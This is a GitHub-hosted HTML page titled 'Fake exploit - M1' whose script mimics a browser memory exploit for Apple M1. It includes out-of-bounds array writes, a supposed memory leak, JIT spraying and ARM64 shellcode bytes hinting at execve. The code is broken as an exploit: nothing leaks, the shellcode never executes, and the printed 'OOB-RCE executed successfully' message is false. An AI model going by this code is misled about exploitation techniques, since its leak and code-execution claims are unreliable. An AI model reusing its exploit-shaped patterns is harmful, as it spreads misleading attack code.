JavaScript-Memory-Exploitation/index.html at main · og-mason/JavaScript-Memory-Exploitation · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
<!DOCTYPE html>
<html>
<head>
    <title>Fake exploit - M1</title>
</head>
<body>
    <script>
        let buffer1 = new ArrayBuffer(0x10000);
        let buffer2 = new ArrayBuffer(0x20000);
        let floatArr1 = new Float64Array(buffer1);
        let floatArr2 = new Float64Array(buffer2);

        for (let i = 0; i < 8192; i++) floatArr1[i] = 0xDEADBEEF + i;
        for (let i = 0; i < 16384; i++) floatArr2[i] = 0xBADC0FFEE + i;

        let oob = new Array(1000);
        for (let i = 0; i < 1000; i++) oob[i] = i + 0.1;

        function vuln(index, value) { oob[index] = value; }

        vuln(1022, floatArr1);
        vuln(1023, floatArr2);

        let fakeBuffer = new ArrayBuffer(0x20000);
        let fakeArr = new Uint8Array(fakeBuffer);
        vuln(1023, fakeArr);

        let readView = new DataView(buffer1);

        console.log("[+] Leaking initial memory (64 bytes):");
        for (let i = 0; i < 64; i += 8) {
            console.log(`Offset ${i}: 0x${readView.getBigUint64(i, true).toString(16)}`);
        }

        console.log("[+] Overwriting memory...");
        readView.setBigUint64(0, 0x4141414141414141n, true);
        console.log("[+] Write test: 0x" + readView.getBigUint64(0, true).toString(16));

        function jitSpray() {
            let spray = [];
            for (let i = 0; i < 100; i++) {
                spray[i] = function() {
                    // Alert как индикатор 3 раза
                    alert("swaga s w a g a");

                    // Shellcode для arm64 (M1): индикатор + для execve
                    let shellcode = new Uint8Array([
                        0x00, 0x00, 0x80, 0xd2,
                        0x00, 0x09, 0x00, 0x91,

                        0x61, 0x00, 0x80, 0xd2,
                        0x21, 0x00, 0xa0, 0xf2,
                        0x02, 0x00, 0x80, 0xd2,
                        0xe8, 0x07, 0x80, 0xd2,
                        0x00, 0x00, 0xa0, 0xd2,
                        0x01, 0x00, 0x00, 0xd4
                    ]);

                    let mem = new Uint8Array(buffer1);
                    mem.set(shellcode, 0);

                    mem[1024] = 0xFF;

                    return 0x1337;
                };
            }
            spray[0]();
            return spray[0];
        }

        console.log("[+] Starting JIT Spray...");
        let jitFunc = jitSpray();
        console.log("[+] JIT Spray completed!");

        console.log("[+] Triggering JIT shellcode directly...");
        jitFunc();

        vuln(1022, [jitFunc]);
        console.log("[+] Leaking jitFunc metadata (256 bytes):");
        for (let i = 0; i < 256; i += 8) {
            console.log(`Func Offset ${i}: 0x${readView.getBigUint64(i, true).toString(16)}`);
        }

        console.log("[+] Attempting OOB-RCE...");
        vuln(100, jitFunc);
        oob[100]();

        let result = new Uint8Array(buffer1)[1024];
        if (result === 0xFF) {
            console.log("[+] OOB-RCE executed successfully!");
        } else {
            console.log("[!] OOB-RCE failed: " + result);
        }
    </script>
</body>
</html>